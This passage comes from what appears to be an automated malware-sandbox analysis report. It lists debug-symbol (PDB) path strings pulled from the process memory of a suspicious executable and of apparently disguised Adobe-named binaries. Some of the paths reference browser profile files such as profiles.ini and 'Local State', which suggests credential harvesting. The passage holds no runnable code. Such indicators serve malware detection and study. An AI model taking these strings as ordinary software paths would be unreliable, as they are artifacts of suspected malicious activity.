Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\profiles.ini source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: C:\JobRelease\win\Release\custact\x86\SharePoint.pdb* source: LVkAi4PBv6.exe, 00000002.00000002.1366762621.000000006D38A000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: _C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\RX_INSTALL\_locales source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2~ source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1843999096.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845197320.0000000002E26000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845099799.0000000002E20000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1844233653.0000000002E26000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1844975114.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1843391555.0000000002E28000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845617901.0000000002E26000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1842862472.0000000002E28000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1844119867.0000000002E20000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1842148106.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2124211584.0000000002E22000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1841979791.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2123111825.0000000002E20000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1842148106.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: 8\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntkrnlmp.pdbM source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E43000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122266355.0000000002E43000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E43000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\profiles.iniG source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121641973.0000000002EBA000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831y source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Z\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\6 source: LocalCtrl_alpha_v3.exe, 00000009.00000002.2208471552.0000000002DE4000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831C source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: C:\JobRelease\win\Release\custact\x86\SharePoint.pdb source: LVkAi4PBv6.exe, 00000002.00000002.1366762621.000000006D38A000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\profiles.iniC source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1843999096.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845197320.0000000002E26000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845099799.0000000002E20000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1844233653.0000000002E26000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1844975114.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1843391555.0000000002E28000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845617901.0000000002E26000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1842862472.0000000002E28000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1844119867.0000000002E20000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1842148106.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: p\Symbols\ntkrnlmp.pdbX source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2124211584.0000000002E22000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2123111825.0000000002E20000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2142328136.0000000002E24000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\profiles.iniw source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121641973.0000000002EBA000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\profiles.ini source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbH source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: zC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbo source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1841979791.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1842148106.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: zC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2124211584.0000000002E22000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2123111825.0000000002E20000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: AXE8SharedExpat.pdbpp5m source: AdobeSync.exe, 00000003.00000002.1394420634.000000006D350000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\profiles.ininix source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831p source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \Temp\Symbols\ntkrnlmp.pdb< source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1841979791.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1842148106.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: C:\agent\_work\8\s\build\ship\x86\burn.pdb source: LVkAi4PBv6.exe, 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp, LVkAi4PBv6.exe, 00000000.00000000.1353994334.00000000008AB000.00000002.00000001.01000000.00000003.sdmp, LVkAi4PBv6.exe, 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp, LVkAi4PBv6.exe, 00000002.00000000.1358153893.000000000060B000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: ntkrnlmp.pdbo source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E43000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122266355.0000000002E43000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E43000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: <\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntkrnlmp.pdbs source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E43000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122266355.0000000002E43000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E43000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831p source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1843999096.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845197320.0000000002E26000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845099799.0000000002E20000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1844233653.0000000002E26000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1844975114.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1843391555.0000000002E28000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845617901.0000000002E26000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1842862472.0000000002E28000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1844119867.0000000002E20000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1842148106.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: _prod.pdb source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\profiles.in source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\ source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntkrnlmp.pdb source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1843999096.0000000002E43000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1843250003.0000000002E43000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845099799.0000000002E43000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E43000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1947218705.0000000002E43000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122266355.0000000002E43000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845617901.0000000002E43000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1842862472.0000000002E43000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E43000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1842148106.0000000002E43000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ols\winload_prod.pdb source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: q\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\profiles.in source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: AdobeSync.exe, 00000003.00000002.1393806393.000000000A14C000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000003.00000002.1394035216.000000000A4A0000.00000004.00000800.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1458777606.000000000A457000.00000004.00000001.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1458405144.0000000009D49000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1458581198.000000000A0A0000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685225598.000000000462B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685843617.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP source: LocalCtrl_alpha_v3.exe, 00000009.00000002.2209575820.0000000003CAA000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2207504685.000000000226B000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2211066150.00000000046A5000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2209762640.0000000003EAF000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2209989172.00000000040A2000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2211471289.00000000048A5000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2210697474.00000000044A8000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2212367556.0000000004AA4000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2210314239.00000000042A9000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2208117967.0000000002BD0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: `C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E0D000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2208471552.0000000002DE4000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: :C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb717 source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\profiles.ini source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121641973.0000000002EBA000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: AdobeCollabSync.pdb source: AdobeSync.exe, 00000003.00000002.1388149267.000000000013D000.00000002.00000001.01000000.00000008.sdmp, AdobeSync.exe, 00000003.00000000.1362863550.000000000013D000.00000002.00000001.01000000.00000008.sdmp, AdobeSync.exe, 00000003.00000003.1382607094.0000000001307000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000000.1387754147.00000000006DD000.00000002.00000001.01000000.0000000D.sdmp, AdobeSync.exe, 00000004.00000002.1449776370.00000000006DD000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\profiles.ini3 source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: 3C:\Users\user\AppData\Roaming\Adobe\ols\winload_prod.pdb) source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: :C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1843999096.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845197320.0000000002E26000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845099799.0000000002E20000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1844233653.0000000002E26000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1844975114.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1843391555.0000000002E28000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845617901.0000000002E26000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1842862472.0000000002E28000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1844119867.0000000002E20000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1842148106.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E0D000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2208471552.0000000002DE4000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1841979791.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1842148106.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\Local State source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1843999096.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845197320.0000000002E26000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845099799.0000000002E20000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1844233653.0000000002E26000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1844975114.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1843391555.0000000002E28000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845617901.0000000002E26000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1842862472.0000000002E28000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1844119867.0000000002E20000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1842148106.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: krnlmp.pdbF source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntdll.pdb source: LocalCtrl_alpha_v3.exe, 00000009.00000002.2209575820.0000000003CAA000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2207504685.000000000226B000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2211066150.00000000046A5000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2209762640.0000000003EAF000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2209989172.00000000040A2000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2211471289.00000000048A5000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2210697474.00000000044A8000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2212367556.0000000004AA4000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2210314239.00000000042A9000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2208117967.0000000002BD0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\profiles.ini source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2124211584.0000000002E22000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2171269604.0000000002E24000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2123111825.0000000002E20000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2170693552.0000000002E24000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2185087878.0000000002E2A000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2208560942.0000000002E1A000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2172330186.0000000002E22000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2142328136.0000000002E24000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2186340967.0000000002E19000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2142540338.0000000002E2A000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2184765975.0000000002E19000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: BIB.pdb` source: AdobeSync.exe, 00000003.00000003.1383616075.00000000012E0000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000003.00000002.1394339156.000000006D321000.00000002.00000001.01000000.0000000A.sdmp, AdobeSync.exe, 00000004.00000002.1459521925.000000006D491000.00000002.00000001.01000000.00000010.sdmp
